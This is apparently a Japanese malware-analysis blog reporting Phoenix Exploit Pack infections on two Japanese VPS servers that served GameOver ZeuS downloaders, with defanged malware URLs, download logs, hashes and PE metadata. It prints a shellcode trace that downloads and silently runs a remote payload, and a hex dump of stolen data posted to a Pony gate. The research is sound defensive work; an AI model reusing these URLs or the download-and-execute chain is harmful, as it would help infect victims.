木曜日, 4月 19, 2012

#OCJP-039-2:日本国内VPSサーバ(219.94.194.138と112.78.124.115)がPhoenix Exploit Packを提供している上体です。海外犯罪者に本VPSが利用されているのか? 【手続き最中】


本件の内容は《#OCJP-039:日本IDC(sakura)サーバ(219.94.194.138と112.78.124.115)がPhoenix Exploit Packに感染されて、GameOver ZeuSトロイのマルウェアがダウンロードされます》事件の続き調査となります。未だ読んでない方々ですと先に#OCJP-039を読んで頂きたいと思います。
下記はPHOENIX EXPLOIT PACKの存在がありました証拠となります。URLとダウンロードの流れを御確認が頂ければ分かると思います。御確認どうぞ!↓
■下記のIPアドレス↓

219.94.194.138と112.78.124.115
■下記のマルウェアURLを発見しました↓

hxxp://112.78.124.115:8080/pages/glavctkoasjtct.php
hxxp://112.78.124.115:8080/internet/fpkrerflfvd.php
hxxp://219.94.194.138:8080/pages/glavctkoasjtct.php
hxxp://219.94.194.138:8080/internet/fpkrerflfvd.php
■ダウンロード流れの証拠↓

上記のURLがダウンロード出来ます↓

--14:00:56--  hxxp://112.78.124.115:8080/pages/glavctkoasjtct.php
           => `glavctkoasjtct.php.1'
Connecting to 112.78.124.115:8080... connected.
hxxp request sent, awaiting response... 200 OK
Length: 286 「text/html」
100%「====================================>」 286           --.--K/s
14:00:57 (10.39 MB/s) - `glavctkoasjtct.php.1' saved 「286/286」
--14:01:19--  hxxp://219.94.194.138:8080/pages/glavctkoasjtct.php
           => `glavctkoasjtct.php.2'
Connecting to 219.94.194.138:8080... connected.
hxxp request sent, awaiting response... 200 OK
Length: 286 「text/html」
100%「====================================>」 286           --.--K/s
14:01:20 (9.67 MB/s) - `glavctkoasjtct.php.2' saved 「286/286」
ダウンロードしたPHPファイルはマルウェアREDIRECTファイルのままです↓

$ cat glavctkoasjtct.php

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "hxxp://www.w3.or
g/TR/html4/loose.dtd">
<html>
 <head>
  <meta hxxp-equiv="Content-Type" content="text/html; charset=utf-8">
 </head>
 <body>
<h1><b>Loading...Please Wait...</b>
<iframe src="../internet/fpkrerflfvd.php"> 
$ cat glavctkoasjtct.php.2

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "hxxp://www.w3.or
g/TR/html4/loose.dtd">
<html>
 <head>
  <meta hxxp-equiv="Content-Type" content="text/html; charset=utf-8">
 </head>
 <body>
<h1><b>Loading...Please Wait...</b>
<iframe src="../internet/fpkrerflfvd.php">
↑また別のPHPに飛ばしてしまいますので、一応確認したら…↓

--14:03:52--  hxxp://219.94.194.138:8080//internet/fpkrerflfvd.php
           => `fpkrerflfvd.php'
Connecting to 219.94.194.138:8080... connected.
hxxp request sent, awaiting response... 302 Found
Location: hxxp://www.google.com 「following」
--14:03:53--  hxxp://www.google.com/
           => `index.html'
Resolving www.google.com... 74.125.235.145, 74.125.235.147, 74.125.235.144, ...
Connecting to www.google.com|74.125.235.145|:80... connected.
hxxp request sent, awaiting response... 302 Found
Location: hxxp://www.google.co.jp/ 「following」
--14:03:53--  hxxp://www.google.co.jp/
           => `index.html'
Resolving www.google.co.jp... 74.125.235.151, 74.125.235.152, 74.125.235.159
Connecting to www.google.co.jp|74.125.235.151|:80... connected.
hxxp request sent, awaiting response... 200 OK
Length: unspecified 「text/html」
    「 <=>                                 」 11,417        --.--K/s
14:03:53 (3.37 MB/s) - `index.html' saved 「11417」
もう1台のサーバも同じ段取りで行くと↓

--14:18:56--  hxxp://112.78.124.115:8080/internet/fpkrerflfvd.php
           => `fpkrerflfvd.php'
Connecting to 112.78.124.115:8080... connected.
hxxp request sent, awaiting response... 302 Found
Location: hxxp://www.google.com 「following」
--14:18:57--  hxxp://www.google.com/
           => `index.html.1'
Resolving www.google.com... 74.125.235.146, 74.125.235.148, 74.125.235.145, ...
Connecting to www.google.com|74.125.235.146|:80... connected.
hxxp request sent, awaiting response... 302 Found
Location: hxxp://www.google.co.jp/ 「following」
--14:18:57--  hxxp://www.google.co.jp/
           => `index.html.1'
Resolving www.google.co.jp... 74.125.235.152, 74.125.235.151, 74.125.235.159
Connecting to www.google.co.jp|74.125.235.152|:80... connected.
hxxp request sent, awaiting response... 200 OK
Length: unspecified 「text/html」
    「 <=>                                 」 11,441        --.--K/s
14:18:57 (2.52 MB/s) - `index.html.1' saved 「11441」
↑最後のindex.htmlの内容は駆除されたHTMLですので、Googleのページへ飛ばされます。


■疑問が出ます

1. 何故PHOENIX EXPLOIT PACKが日本国内VPSにあるIPだけに沢山発見したのか?
2. 本事件は只の感染された事件なのか?(ウェブ脆弱性経由の感染なら確かに可能性があります)
3. 若しくは…日本国内のIDC/VPSサービスがロシアの犯罪者に利用されているのか?(調査が必要)
下記のグラフを見たら上記の質問の回答が分かると思います。





↑上記のグラフを見たら、現状、219.94.194.138と112.78.124.115がロシアマルウェア犯罪者に
使われている状況と見える。
詰り、上記に書いたドメイン経由に日本IDC/VPSを使い、色んなマルウェア感染仕組みを作られます。
これで、何故か219.94.194.138と112.78.124.115に最近沢山ZeuSマルウェアを発見したかと分かりました。
本件の次の手続きはJP-CERT側任せております。証明は以上です。
---
ゼロデイ・ジャパン http://0day.jp
マルウェア研究所
Analyst: アドリアン・ヘンドリック / Hendrik ADRIAN
Sponsored by: 株式会社ケイエルジェイテック


TO BE NOTICED: All of the findings and exposed material in this site is belong to the site owner and is an original
materials. Any COPY of research material without written permission from unixfreaxjp/site owner is strictly prohibited. Any attempt to camouflage and attempt to owning this research material will be prosecuted by law.
Posted by unixfreaxjp at 3:01 午後 0 comments

水曜日, 4月 18, 2012

#OCJP-039:日本IDC(sakura)サーバ(219.94.194.138と112.78.124.115)がPhoenix Exploit Packに感染されて、GameOver ZeuSトロイのマルウェアがダウンロードされます。 【対応最中】


Phoenix Exploit Packにハッキングされた日本のIDCサーバが発見されました。原因は間違い無くまたウェブ脆弱性がもっているサイトです。現在感染されたポートとファイルが未だアップされている状況ですが、感染されたPHPファイルがexpiredされたそうです。仕事した時に発見しました、やっと今レポートが書ける状況になったけど、未だ作業待機状況ですので、長く書くのはは出来ません。申し訳ありません。
さて、詳細情報は下記となります。
■下記のサーバ↓

219.94.194.138と112.78.124.115
■下記のURL↓

hxxp://poluicenotgo.ru:8080/internet/at.php?i=15
hxxp://219.94.194.138:8080/internet/at.php?i=15
hxxp://112.78.124.115:8080/internet/at.php?i=15
■マルウェア種類↓

アファイル  :「○○.php」
マルウェア種類: Phoenix Exploit PackのZeusトロイダウンローダー
マルウェア名 : Trojan.Win32.Generic、Trojan.Downloader など
マルウェア機能: マルウェアファイルをダウンロードされます
説明     : PHOENIX EXPLOIT PACKのダウンロードサイトからの
                 マルウェアをダウンロードされる
                 マルウェアサイトに接続動きを発見、データ送信も発見
■URLのアクセス証拠↓

hxxp://219.94.194.138:8080/internet/at.php?i=15
GET /internet/at.php?i=15 HTTP/1.1
Host: 219.94.194.138:8080
User-Agent: Mozilla/5.0 FreeBSD 8.2; rv:11.0) Gecko/20100101 Firefox/11.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ja,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive

HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Wed, 18 Apr 2012 12:47:12 GMT
Content-Type: text/html; charset=CP-1251
Connection: keep-alive
X-Powered-By: PHP/5.2.17-1.1
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20

hxxp://112.78.124.115:8080/internet/at.php?i=15
GET /internet/at.php?i=15 HTTP/1.1
Host: 112.78.124.115:8080
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ja,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive

HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Wed, 18 Apr 2012 12:48:42 GMT
Content-Type: text/html; charset=CP-1251
Connection: keep-alive
X-Powered-By: PHP/5.2.17-1.1
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
↑上記のPHPが存在しておりますが、下記のようにアクセスしたら現在の回答はNULLの状況です、が…

--22:01:18--  hxxp://219.94.194.138:8080/internet/at.php?i=15
           => `at.php@i=15.2'
Connecting to 219.94.194.138:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 0 [text/html]
    [ <=>                                 ] 0             --.--K/s
22:01:19 (0.00 B/s) - `at.php@i=15.2' saved [0/0]

--22:00:39--  hxxp://112.78.124.115:8080/internet/at.php?i=16
           => `at.php@i=16.3'
Connecting to 112.78.124.115:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 0 [text/html]
    [ <=>                                 ] 0             --.--K/s
22:00:39 (0.00 B/s) - `at.php@i=16.3' saved [0/0]
↑6時間前ですと、上記のURLをアクセスすると下記のマルウェアがダウンロードされました!!

File name:       esfwatkocliuyn.exe
MD5:             5726463108bb6f26e6dd54763e85453b
File size:       132.1 KB ( 135264 bytes )
File type:       PE/Win32 EXE
Detection ratio: 21 / 41
Analysis date:   2012-04-18 09:09:09 UTC
result:          [CLICK]
アイコン↓

※6時間前に私は仕事最中でしたので…直ぐにレポートがかけなくて、サンプルだけを保存しました…(T T)
※目的は感染PHPファイルが未だサーバに残ったままですね…何とかしないと…

今私は仕事作業最中ですので、詳しく書く時間が出来ないですが、
上記のマルウェアはGAMEOVER ZEUSトロイのダウンローダーです。
上記のマルウェアを実行したら下記のURLにアクセスがでて、
GAMEOVER ZEUSマルウェアをダウンロードされます↓

hxxp://abbott.u4ria.co.za/HGFg1RHz/MkiZMX.exe
hxxp://dynolite.eu/7U0ASvP9/AZz.exe
hxxp://demircioglubilgisayar.com.tr/qy3kMMxv/VgWqQm4k.exe
MD5: a3e56f7ba6cd98b2ac87596daf74e2aa
Size: 3,71,808 bytes
本件「esfwatkocliuyn.exe」のトロイダウンローダーには下記のプロパーティが持っています↓

Signature:         : VfnHcYKXDLnVlQizT9uLI4yhP ←//デジタル認証!!
Certificate Validity      : 04/16/2012 to 01/01/2040 ←//デジタル認証期間!!
Publisher                 : Microsoft Corporation
Product                   : Microsoft_ Windows_ Operating System
Internal name             : DFDWiz.exe
Copyright                 : (c) Microsoft Corporation. All rights reserved.
Original name             : DFDWiz.exe
File version              : 6.1.7600.16385 (win7_rtm.090713-1255)
Description               : Windows Disk Diagnostic User Resolver
UninitializedDataSize     : 0
InitializedDataSize       : 20992
ImageVersion              : 0.0
ProductName               : Microsoft   Windows   Operating System
FileVersionNumber         : 6.1.7600.16385
LanguageCode              : English (U.S.)
FileFlagsMask             : 0x003f
FileDescription           : Windows Disk Diagnostic User Resolver
CharacterSet              : Unicode
LinkerVersion             : 2.5
FileOS                    : Windows NT 32-bit
MIMEType                  : application/octet-stream
Subsystem                 : Windows GUI
FileVersion               : 6.1.7600.16385 (win7_rtm.090713-1255)
TimeStamp                 : 2012:04:17 09:48:09+02:00
FileType                  : Win32 EXE
PEType                    : PE32
InternalName              : DFDWiz.exe
ProductVersion            : 6.1.7600.16385
SubsystemVersion          : 4.0
OSVersion                 : 4.0
OriginalFilename          : DFDWiz.exe
LegalCopyright            : Microsoft Corporation. All rights reserved.
MachineType               : Intel 386 or later, and compatibles
CompanyName               : Microsoft Corporation
CodeSize                  : 112128
FileSubtype               : 0
ProductVersionNumber      : 6.1.7600.16385
EntryPoint                : 0x1b0a0
ObjectFileType            : Executable application
さらにPEのstructureはこんな感じです↓

Name        Virtual Address  Virtual Size  Raw Size  Entropy  MD5
.text                  4096        109966    110080     7.01  23d7ac2fe7fffdf0abb66ae018c90ee9
.data                114688         11652     11776     5.59  e2f2b3a0f2bb04ce00ba0849d9aed782
.text5               126976          1000      1024     0.16  01cb5594d3b2c332c81196b782ade080
.text6               131072          1000      1024     0.16  01cb5594d3b2c332c81196b782ade080
.rsrc                135168          7132      7168     4.37  b47f53e76a6ec403d1ea28e3ab0d4eb5
.reloc               143360          1992      2048     6.36  0809868ffda2eb5b8ccc0431edfb67e9
■マルウェア情報

マルウェア発見履歴を確認したら

First seen :2012-04-17 08:07:12 UTC ( 1 日, 5 時間 ago )
Last seen  :2012-04-18 13:06:03 UTC ( 14 分 ago ) 
発見したのパソコンは地図を見たら下記のようになります↓


マルウェアのバイナリーを急いで調査したら↓

TimeDateStamp:0x4F8D2039 
(Tue Apr 17 07:48:09 2012 UTC)大体JSTから見ると24時間以内に作った物ですね。

目的は情報盗むマルウェアですので、CLIPBOARD情報を取れますね↓
USER32.dll.GetClipboardFormatNameA Hint[272]
USER32.dll.RegisterClipboardFormatW Hint[568]
USER32.dll.CountClipboardFormats Hint[80]
USER32.dll.EnumClipboardFormats Hint[217]
USER32.dll.SetClipboardData Hint[621]
USER32.dll.GetOpenClipboardWindow Hint[340]
USER32.dll.SetClipboardViewer Hint[622]

それでキーボードのオペレーションもモニターされます↓
0x41c8a0 GetKeyState
0x41cb94 GetAsyncKeyState
USER32.dll.keybd_event Hint[773]
USER32.dll.VkKeyScanExW Hint[758]

そのたマルウェアオペレーション↓
KERNEL32.dll.VirtualAllocEx Hint[1109] //exec準備環境
KERNEL32.dll.CreateFileA Hint[120] //ファイルを作る
USER32.dll.MapVirtualKeyW Hint[498] //キーマップ
USER32.dll.MapVirtualKeyExA Hint[496]
USER32.dll.SendNotifyMessageA Hint[612] //メッセージ
USER32.dll.SendIMEMessageExA Hint[603]
USER32.dll.SendMessageCallbackA Hint[607] //メッセージ
USER32.dll.CallMsgFilterA Hint[25]
USER32.dll.WaitMessage Hint[765] //メッセージ
USER32.dll.EnumDisplayDevicesA Hint[221] //パソコン情報
USER32.dll.GetShellWindow Hint[362] //ファイルを実行
USER32.dll.DdeNameService Hint[131]
USER32.dll.OpenWindowStationA Hint[533] //パソコン情報
msvcrt.dll.memcpy Hint[634]  //cpalloc
ADVAPI32.dll.RegOpenKeyExW Hint[603] //registry読み込み

ダウンロード/URLやり取り↓
SHLWAPI.dll.UrlUnescapeW Hint[360]
SHLWAPI.dll.UrlIsNoHistoryW Hint[355]
SHLWAPI.dll.UrlCreateFromPathW Hint[343]
SHLWAPI.dll.UrlGetPartA Hint[349]
SHLWAPI.dll.UrlHashW Hint[352]
SHLWAPI.dll.UrlUnescapeA Hint[359]
SHLWAPI.dll.UrlCompareA Hint[340]
SHLWAPI.dll.UrlIsOpaqueW Hint[357]
SHLWAPI.dll.UrlApplySchemeW Hint[335]
SHLWAPI.dll.UrlCombineW Hint[339]
などなど。。。

■感染された環境↓

本マルウェアは「poluicenotgo.ru」のボットネットで提供されています。
下記のネットワーク図↓ですので、マークされたネットワークは本件の感染↓


洗い出したらさくらIDCの情報が出ました↓


よーくインターネットで調べたら、本件の感染はじまりは下記のスパムメールからです↓


本件は間違いなくボットネットが日本のウェブ脆弱性の状況が分かったの上で
攻撃した結果だと思われます。←【お願い!注意して下さい!!】
----
ゼロデイ・ジャパン http://0day.jp
マルウェア研究所
Analyst: アドリアン・ヘンドリック / Hendrik ADRIAN
Sponsored by: 株式会社ケイエルジェイテック


TO BE NOTICED: All of the findings and exposed material in this site is belong to the site owner and is an original
materials. Any COPY of research material without written permission from unixfreaxjp/site owner is strictly prohibited. Any attempt to camouflage and attempt to owning this research material will be prosecuted by law.
Posted by unixfreaxjp at 11:11 午後 0 comments

火曜日, 4月 10, 2012

#OCJP-037:国内のIDC(SAKURA)に2件PHOENIX Exploit pack経由のZeuSトロイダウンローダーを発見! 【対応最中】


今回の発見はまたZeuSマルウェアの感染部品を発見し、「PHOENIX EXPLOIT KITバーション3.1」に感染された2つウェブサイトをの事件です。まったく同じ感染部品だし、同じ居データセンター(SAKURA/IDC)ですから、別々の事件レポートを書くのは面倒くさいなので、纏めて書きました。出来る限り「PHOENIX EXPLOIT KITバーション3.1」の説明をさせて頂きます。
さて、レポートは下記となります↓
■下記の2件のウェブサーバ/IPアドレス↓

112.78.124.115
219.94.194.138
■下記のURL↓

hxxp://112.78.124.115:8080/navigator/clxsimbrinel.pdf
hxxp://219.94.194.138:8080/navigator/clxsimbrinel.pdf
hxxp://219.94.194.138:8080/navigator/frf3.php
hxxp://112.78.124.115:8080/navigator/frf3.php 
■ダウンロード証拠↓

--14:52:42--  hxxp://112.78.124.115:8080/navigator/clxsimbrinel.pdf
           => `clxsimbrinel.pdf'
Connecting to 112.78.124.115:8080... connected.
hxxp request sent, awaiting response... 200 OK
Length: 13,235 (13K) [application/pdf]
100%[====================================>] 13,235        46.50K/s
14:52:43 (46.35 KB/s) - `clxsimbrinel.pdf' saved [13235/13235]

--14:59:39--  hxxp://219.94.194.138:8080/navigator/clxsimbrinel.pdf
           => `clxsimbrinel.pdf.1'
Connecting to 219.94.194.138:8080... connected.
hxxp request sent, awaiting response... 200 OK
Length: 13,235 (13K) [application/pdf]
100%[====================================>] 13,235        --.--K/s
14:59:40 (164.89 MB/s) - `clxsimbrinel.pdf.1' saved [13235/13235]

--15:08:14--  hxxp://219.94.194.138:8080/navigator/frf3.php
           => `frf3.php'
Connecting to 219.94.194.138:8080... connected.
hxxp request sent, awaiting response... 200 OK
Length: 147,496 (144K) [application/octet-stream]
100%[====================================>] 147,496      118.24K/s
15:08:16 (118.14 KB/s) - `frf3.php' saved [147496/147496]

--15:09:01--  hxxp://112.78.124.115:8080/navigator/frf3.php
           => `frf3.php.1'
Connecting to 112.78.124.115:8080... connected.
hxxp request sent, awaiting response... 200 OK
Length: 147,496 (144K) [application/octet-stream]
100%[====================================>] 147,496      100.06K/s
15:09:03 (99.96 KB/s) - `frf3.php.1' saved [147496/147496] 
■ファイルの形はこんな感じ↓

-rwx------   1  13235 Apr  8 08:37 clxsimbrinel.pdf
-rwx------   1 147496 Apr  9 21:08 frf3.php

frf3.php         65ac9035d47dfcb632a24a95098090b6
clxsimbrinel.pdf 0e24d38adc791529565afe905d60b733

アイコン↓

※PDFファイルはそのままですが、中身はマルウェアコードされたJavaScriptを発見しました。
※FRF3.PHPファイルはWindowsの実行バイナリーです。
■ウイルススキャン結果↓

File name:       clxsimbrinel.pdf
MD5:             0e24d38adc791529565afe905d60b733
File size:       12.9 KB ( 13235 bytes )
File type:       PDF
Detection ratio: 30 / 42
Analysis date:   2012-04-10 06:21:55 UTC
Result:          [CLICK]

File name:       frf3.php
MD5:             65ac9035d47dfcb632a24a95098090b6
File size:       144.0 KB ( 147496 bytes )
File type:       Win32 EXE
Detection ratio: 7 / 42
Analysis date:   2012-04-10 06:20:59 UTC
Result:          [CLICK]
■マルウェア種類

アファイル  :「○○.pdf」
マルウェア種類: Phoenix Exploit PackのJavaScript Trojan REDIRECTOR       
                 (ZeuS感染仕組み)
マルウェア名 : PDF/Exploit、PDF/JS.Redir、PDF/Trojan.JS.Agent など
マルウェア機能: マルウェアサイトのJavascriptをダウンロードと実行される
説明     : PHOENIX EXPLOIT PACKから感染されたURLのPDF感染ファイル
                 クリックしてしまうとマルウェアサイトへ飛ばされて、
                 マルウェアがダウンロードされます 

アファイル  :「○○.php」
マルウェア種類: Phoenix Exploit PackのZeusトロイダウンローダー
マルウェア名 : Trojan.Win32.Generic、Trojan.Downloader など
マルウェア機能: マルウェアファイルをダウンロードされます
説明     : PHOENIX EXPLOIT PACKのダウンロードサイトからの
                 マルウェアをダウンロードされる
                 マルウェアサイトに接続動きを発見、データ送信も発見 
■マルウェア調査
本件の感染事件はPHOENIX EXPLOIT V3.1から感染ですので、少しPHOENIX EXPLOIT KITを説明します。
丁度友達研究者がPHOENIX EXPLOIT KITに感染されたサイトのスナップショットがあるからそこから説明始まります。

PHOENIX EXPLOIT V3.1の説明

ログイン画面はこんな感じです↓

(Credit: Xylit0l/Xylibox)

EXPLOIT機能データベースの中に本件のマルウェアPDFが使っているEXPLOIT情報が入っています↓

(Credit: Xylit0l/Xylibox)

日本の感染されたウェブサイトの情報↓

(Credit: Xylit0l/Xylibox)
このEXPLOIT PACKにハッキングされたサイトは下記のファイルセットを発見が出来ます↓


(Credit: snowfl0w/Contagio)
↑本件の発見は上記の画像でマークしたPDFファイルです。
全世界にはPHOENIXからの感染が一昨日から急に超えてしまいましたので、
ブラックリストにはこのぐらいに発見しました↓


※本件の発見は登録しました。パターンは同じなので、ポート8080の後はPHP、JAR、EXEのファイルが入っています。
今回のPHOENIX EXPLOIT PACK感染仕組み的には下記となります↓


↑始まりは間違いなく同じでスパムメールからです、
blackholeと違う所はPHOENIXではjarとpdfファイルを使えます(選択で出来そうです)
■Exploit Packのマルウェアファイルの調査

1. clxsimbrinel.pdf OR nantokakantoka.PDF


本PDFの下記の所にjavascriptを発見しました。

↑obfuscatedのスクリプトですね。e v a lのバリューを確認したら下記のように出ました↓

↑
色んな方法を試してみたら下記のSHELLCODEが出ました↓

↑
見辛いので、ASCIIで見ようと、URLが過ぎに発見しました、今回は難しくないですね(^^↓

↑気にしている方々の為に自分の使っているツールのsナップショット画像↓


このSHELLCODEの調査が必要ですね。
よく見たらCVE-2010-0188のADOBE脆弱性PoCのコードが入っています。
ウイルススキャンしたらこの結果が出ます→【CLICK】←既に検知が出来ている物です(AVのパターンDBに登録された)
行動分析調査したらこのDLLファイルを使っています→kernel32.dllとurlmon.dll
脆弱性を起こしたら、マルウェアの動き始まりますので、下記の順番↓

0x7c801ad9 DLL:kernel32 CALL:VirtualProtect lpAddress=0x402202, dwSize=255
0x7c801d7b DLL:kernel32 CALL:LoadLibraryA   lpFileName=urlmon(stack to CALL DLL)
0x7c835dfa DLL:kernel32 CALL:GetTempPathA   
                        lpBuffer=0x22fa60, nBufferLength=248, (VAR INITIATION)
                        lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\] (STRING ALLOC)
0x1a494bbe DLL:urlmon   CALL:URLDownloadToFileA
                        pCaller=0, szURL=hxxp://engineofsovjets.su:8080/navigator/frf3.php?i=8, 
                        lpfnCB=0x0, szFileName=C://DOCUME~1\Administrator\LOCALS~1//Temp\wpbt0.dll
0x7c86250d DLL:kernel32 CALL:WinExec
                        lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0
0x7c86250d DLL:kernel32 CALL:WinExec
                        lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll
                        uCmdShow=0
0x7c81cb3b DLL:kernel32 CALL:TerminateThread : dwExitCode=0 
↑ようするに下記の意味合いです↓

1. hxxp://engineofsovjets.su:8080/navigator/frf3.php?i=8からのURLをダウンロード
2. C://DOCUME~1\Administrator\LOCALS~1//Temp\wpbt0.dllへ保存
3. 保存したファイルをそのままでSILENTで実行
4. さらにWindowsのレジストリーに登録、で終了。
2. frf3.php OR wpbt0.dll

このファイルを実行されたら下記の動きを発見しました↓

保存されたファイル↓

%Temp%\oid.bat
%CurrentDir%\wpbt0.dll 
レジストリーの変更点↓

HKEY_CURRENT_USER\Software\WinRAR
→ HWID = 7B 37 41 32 35 46 34 30 44 2D 33 34 41 42 2D 34 46 34 36 
           2D 42 33 45 46 2D 41 46 39 35 44 34 41 38 32 42 33 38 7D 
ネットワーク動きは↓

DNS依頼↓

www.alberghi.com
    buyandsmile.atomclick.co
    contabilidadesr.com.br
    www.vandenboschelektro.be
    geovanabauerdocesfinos.com.br
ダウンロード依頼↓

hxxp://contabilidadesr.com.br/1mmF86V8/Vdqu.exe
    hxxp://www.vandenboschelektro.be/vgwCwvDs/Y9fNYJCs.exe
    hxxp://geovanabauerdocesfinos.com.br/6md3zev5/hQj.exe 
バックドアー動き↓

www.alberghi.com TCP/8080
送信された情報↓

00000000 | 504F 5354 202F 706F 6E79 2F67 6174 652E | POST /pony/gate.
00000010 | 7068 7020 4854 5450 2F31 2E30 0D0A 486F | php HTTP/1.0..Ho
00000020 | 7374 3A20 7777 772E 616C 6265 7267 6869 | st: www.alberghi
00000030 | 2E63 6F6D 0D0A 4163 6365 7074 3A20 2A2F | .com..Accept: */
00000040 | 2A0D 0A41 6363 6570 742D 456E 636F 6469 | *..Accept-Encodi
00000050 | 6E67 3A20 6964 656E 7469 7479 2C20 2A3B | ng: identity, *;
00000060 | 713D 300D 0A43 6F6E 7465 6E74 2D4C 656E | q=0..Content-Len
00000070 | 6774 683A 2031 3932 0D0A 436F 6E6E 6563 | gth: 192..Connec
00000080 | 7469 6F6E 3A20 636C 6F73 650D 0A43 6F6E | tion: close..Con
00000090 | 7465 6E74 2D54 7970 653A 2061 7070 6C69 | tent-Type: appli
000000A0 | 6361 7469 6F6E 2F6F 6374 6574 2D73 7472 | cation/octet-str
000000B0 | 6561 6D0D 0A43 6F6E 7465 6E74 2D45 6E63 | eam..Content-Enc
000000C0 | 6F64 696E 673A 2062 696E 6172 790D 0A55 | oding: binary..U
000000D0 | 7365 722D 4167 656E 743A 204D 6F7A 696C | ser-Agent: Mozil
000000E0 | 6C61 2F34 2E30 2028 636F 6D70 6174 6962 | la/4.0 (compatib
000000F0 | 6C65 3B20 4D53 4945 2035 2E30 3B20 5769 | le; MSIE 5.0; Wi
00000100 | 6E64 6F77 7320 3938 290D 0A0D 0A43 5259 | ndows 98)....CRY
00000110 | 5054 4544 3094 8E01 19A5 3F45 D2ED 2B1D | PTED0.....?E..+.
00000120 | AB40 58CA 51C0 C0AA 4DFF E41F A0D5 69D6 | .@X.Q...M.....i.
00000130 | 86B8 1866 7898 C311 9146 8568 375A 430F | ...fx....F.h7ZC.
00000140 | D4DC ED14 32F0 2E42 E8DC 2ADA B141 10C5 | ....2..B..*..A..
00000150 | A541 60B8 B2C6 5B79 E3F5 A6BD CACA 9559 | .A`...[y.......Y
00000160 | E8EA 5CD1 0A23 8263 DC3C 48A7 D320 5C75 | ..\..#.c.<H.. \u
00000170 | 1482 5A44 CC20 5F4D 407A 7A27 E589 9BF6 | ..ZD. _M@zz'....
00000180 | 37BE CA9F 909F C33C B144 F365 7126 C843 | 7......<.D.eq&.C
00000190 | 3811 AD7C 9D4F 0192 4B90 2AA6 C5DB 678D | 8..|.O..K.*...g.
000001A0 | 402A F780 7BCA 1082 CAE0 E25A D766 EC57 | @*..{......Z.f.W
000001B0 | BD1E 4383 09FD 2EA3 504F DBED 1CC7 5B4B | ..C.....PO....[K
000001C0 | 3314 199A F367 D84D 0E53 10F4 C8        | 3....g.M.S... 


↑よーく見たらあるPHOENIX EXPLOITサイトにあるGATE.PGPに情報を送信された。
そのファイルを確認したら下記の情報が出ました↓

$ cat gate.php
STATUS-IMPORT-OK
※↑ダウンロードが出来たらこのやり取りを発見しました!
3. Vdqu.exe、Y9fNYJCs.exe、hQj.exe (ZeuS/ZBotトロイ)

上記のダウンロードURLをダウンロードしたら、全てダウンロードが出来ちゃいました↓

--16:20:32--  hxxp://contabilidadesr.com.br/1mmF86V8/Vdqu.exe
           => `Vdqu.exe'
Resolving contabilidadesr.com.br... 187.45.210.78
Connecting to contabilidadesr.com.br|187.45.210.78|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 305,704 (299K) [application/octet-stream]
100%[====================================>] 305,704       64.51K/s    ETA 00:00
16:20:38 (64.40 KB/s) - `Vdqu.exe' saved [305704/305704]


--16:20:50--  hxxp://www.vandenboschelektro.be/vgwCwvDs/Y9fNYJCs.exe
           => `Y9fNYJCs.exe'
Resolving www.vandenboschelektro.be... 195.130.132.84
Connecting to www.vandenboschelektro.be|195.130.132.84|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 305,704 (299K) [application/octet-stream]
100%[====================================>] 305,704       79.59K/s    ETA 00:00
16:20:55 (79.41 KB/s) - `Y9fNYJCs.exe' saved [305704/305704]

--16:21:09--  hxxp://geovanabauerdocesfinos.com.br/6md3zev5/hQj.exe
           => `hQj.exe'
Resolving geovanabauerdocesfinos.com.br... 209.126.254.125
Connecting to geovanabauerdocesfinos.com.br|209.126.254.125|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 305,704 (299K) [application/x-executable]
100%[====================================>] 305,704      160.02K/s
16:21:12 (159.41 KB/s) - `hQj.exe' saved [305704/305704] 
見た目はこんな感じです↓

-rwx------   1 305704 Apr  9 22:00 Vdqu.exe
-rwx------   1 305704 Apr  9 22:00 Y9fNYJCs.exe
-rwx------   1 305704 Apr  9 21:52 hQj.exe

アイコン↓

※)上記の3つファイルの見た目は同じです。
ウイルススキャン結果↓

File name:       などなど.exe (色んなランダム名前)
MD5:             05409f83898aea65fda75a9a0b35eb8f
File size:       298.5 KB ( 305704 bytes )
File type:       Win32 EXE
Detection ratio: 5 / 42
Analysis date:   2012-04-10 09:22:26 UTC 
Result:          [CLICK] 
マルウェアの種類↓

アファイル  :「○○.exe」
マルウェア種類: ZeuS/ZBotのトロイ・マルウェア
マルウェア名 : Win32/Trojan/ZeuS, Kryptik, Zbot、などなど
マルウェア機能: スパイウェア、キーロガー、ボットネット、ブラウザーやり取り情報を盗む
説明     : 感染されたPCにブラウザーのキーボードとログイン情報をリモートに送信される
                 メモリーのスナップショットがリモートから取れる可能性がある。
マルウェアファイル調査↓

1. TimeDateStamp: 0x4F83D7A4 [Tue Apr 10 06:48:04 2012 UTC]
2. CRC Fail, Claimed:  351095 Actual:  351094 
3. Linker Info: 2.50
4. EP Section: .text (Entropy 7.72132137278) <== PACKED!
   
5. Fake Software Name:
   Length:                        0x2EA     
   ValueLength:                   0x0       
   Type:                          0x1       
   LangID:                        040904B0
   LegalCopyright: \xa9 Microsoft Corporation. All rights reserved.
   InternalName: DFDWiz.exe
   FileVersion: 6.1.7600.16385 (win7_rtm.090713-1255)
   CompanyName: Microsoft Corporation
   ProductName: Microsoft\xae Windows\xae Operating System
   ProductVersion: 6.1.7600.16385
   FileDescription: Windows Disk Diagnostic User Resolver
